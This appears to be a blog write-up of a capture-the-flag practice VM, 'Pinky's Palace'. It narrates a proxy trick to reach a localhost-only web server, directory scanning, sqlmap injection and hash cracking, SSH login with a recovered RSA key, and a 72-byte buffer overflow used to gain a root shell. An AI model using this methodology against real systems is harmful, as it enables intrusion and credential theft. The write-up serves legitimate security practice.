A friend of mine tipped me off to this awesome website that hosts vulnerable VMs for security engineers to practice hacking into. Not only does it promote learning new skills, it also keeps your old skills sharp for future pentests.
Today I found a VM called Pinky’s Palace that required me to learn how to use a proxy to get a server to think its logging into itself. Here’s how I did it.
When logging in, you see this screen. It gives you the IP of the victim box and what flag you need to read. Unfortunately, that is as far as you can get on the box.
I launched an nmap scan. Since I was the owner of the box and I didn’t need to worry about getting caught, I set it to the fastest scan possible to save time. The command I used is
nmap -O -sV -sT -T5 -p- 10.29.9.33. We found a few open ports and services. We knew that
8080 is open and running an nginx web server,
31337 is running a Squid proxy server, and
64666 is running SSH.
When trying to access port 8080 through the web browser you get a 401 access denied for any URL. Looks like the box only allows local connections. hmmmmm…
We can test this using a Curl command!
By pushing the curl command and using the box’s proxy server against it, we can make it think its asking itself for the landing page. In a real application, this would be a horrible way to implement a web server because you won’t be able to access it from anywhere without adding a proxy to itself.
Next step is to find something to attack, or at least get some sort of file structure of the web server. There are a few ways to do this, but I’m going to go with the easiest, automated way. Enter dirb, a web content scanner that finds web objects attached to webpages.
By using an existing wordlist built into Kali, we can see what directories exist behind the landing page. It scans by using a wordlist and sending HTTP requests. If the server sends back a “200 Success”, there is something there, if you get a “404”, it moves to the next word. We came back with a directory called “littlesecrets-main” landing page, with “login.php” and “logs.php”behind it. What database service works with nginx and PHP?? MYSQL.
Now we get to try SQL injections!
I started running sqlmap to dump out all of the tables in the database, but there were a bunch of useless ones in there. Once I figured that out, I just targeted the “users” database. Two hours later, I had usernames and what looked like hashes of passwords! The next step was to figure out what these passwords were. You can waste time and effort and crack them using hashcat and a wordlist, but I’m lazy. I plugged them into CrackStation and found one of the hashes in their wordlist. Work smarter, not harder!
I used that password to connect as the user “pinkymanage” using the obfuscated SSH port at 64666.
We have access to the box! Next, we start digging. We know there is already some stuff in the web server’s directory so lets start there. We use the command
cd /var/www/html/ to get to the web server’s directory.
We can see the login page, and a comment that says the admin only allows localhost access. Looks like our hunch was right and the proxy trick was the only way in. Inside of the little secrets folder, there was another hidden folder, “ultrasecretadminf1l35” that contained a text file and a hidden file.
Looks like the server admin is forgetful and forgets the admin password. They encoded an RSA key into base64 and hid it in that directory. No worries! a cat and pipe is all we need to get the original key!
Now can we use that to log into the server as the admin user “Pinky”??
Yep. Next step is to find a way to escalate privileges and become a root user to access the root directory.
We immediately get a hint in the home directory of Pinky, a note that tells us sudo is hard to configure. Apparently the purpose of this program is to generate a root shell, but it only prints out the text you give it as an argument. Does it call another function with the proper input?
I launched a debugger and found a spawn function. Disassembling it shows that it executes as root and passes whatever text you gave the “adminhelper” program as instructions for root at some point. But how do we get “spawn” to execute???
Lets look at the Main function: THERE IS A BUFFER OVERFLOW! Lets see what happens when we overload it.
I fed it a series of single characters and found out 72 bytes is where the overflow occurs. This means we can inject a new pointer immediately after that to get a root shell. To make it easier, I used python to make an output file that contained the full overflow needed in plaintext. We use
` to break and feed the output as a command to force the overflow, the last 6 bytes are instructions that point to the “setuid” function in the program and open a root shell.